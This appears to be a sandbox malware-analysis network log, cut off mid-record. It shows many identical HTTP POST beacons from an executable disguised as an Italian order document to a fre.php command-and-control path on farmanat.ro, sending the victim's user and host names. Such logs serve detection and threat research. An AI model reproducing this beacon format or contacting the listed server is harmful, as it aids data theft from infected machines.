Nov 25, 2021 10:49:56.095452070 CET	6610	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
208	192.168.11.20	50050	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:56.523325920 CET	6611	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:56.557507038 CET	6611	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:56.607505083 CET	6611	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
209	192.168.11.20	50051	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:57.024274111 CET	6612	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:57.057851076 CET	6612	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:57.107912064 CET	6612	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.11.20	49856	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:15.068809032 CET	6334	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:15.102410078 CET	6334	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:15.152544022 CET	6335	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
210	192.168.11.20	50052	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:57.509550095 CET	6613	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:57.543764114 CET	6613	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:57.599325895 CET	6614	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
211	192.168.11.20	50053	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:58.004626989 CET	6615	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:58.038615942 CET	6615	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:58.094089031 CET	6615	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
212	192.168.11.20	50054	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:58.514003038 CET	6616	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:58.547497034 CET	6616	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:58.599456072 CET	6616	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
213	192.168.11.20	50055	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:59.022258043 CET	6617	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:59.056468010 CET	6617	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:59.109958887 CET	6618	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
214	192.168.11.20	50056	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:59.545414925 CET	6619	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:59.579639912 CET	6619	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:59.630707979 CET	6619	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
215	192.168.11.20	50057	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:00.060117006 CET	6620	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:00.093959093 CET	6620	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:00.143248081 CET	6620	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
216	192.168.11.20	50058	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:00.566565990 CET	6621	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:00.600120068 CET	6621	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:00.649194956 CET	6622	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
217	192.168.11.20	50059	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:01.074114084 CET	6622	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:01.107786894 CET	6623	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:01.157417059 CET	6623	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
218	192.168.11.20	50060	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:01.589853048 CET	6624	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:01.623557091 CET	6624	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:01.676860094 CET	6624	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
219	192.168.11.20	50061	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:02.090230942 CET	6625	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:02.124475002 CET	6625	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:02.179992914 CET	6626	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.11.20	49857	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:15.740662098 CET	6335	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:15.774986029 CET	6336	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:15.825707912 CET	6336	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
220	192.168.11.20	50062	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:02.599251032 CET	6626	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:02.632785082 CET	6627	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:02.692435980 CET	6627	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
221	192.168.11.20	50063	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:03.115367889 CET	6628	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:03.148951054 CET	6628	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:03.229101896 CET	6628	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
222	192.168.11.20	50064	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:03.594284058 CET	6629	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:03.628284931 CET	6629	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:03.702130079 CET	6630	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
223	192.168.11.20	50065	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:04.083753109 CET	6630	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:04.117153883 CET	6631	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:04.190560102 CET	6631	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
224	192.168.11.20	50066	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:04.617831945 CET	6632	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:04.651456118 CET	6632	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:04.764955044 CET	6632	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
225	192.168.11.20	50067	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:50:05.185904980 CET	6633	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:50:05.220136881 CET	6633	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:50:05.275226116 CET	6634	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:50:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
226	192.168.11.20	50068	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
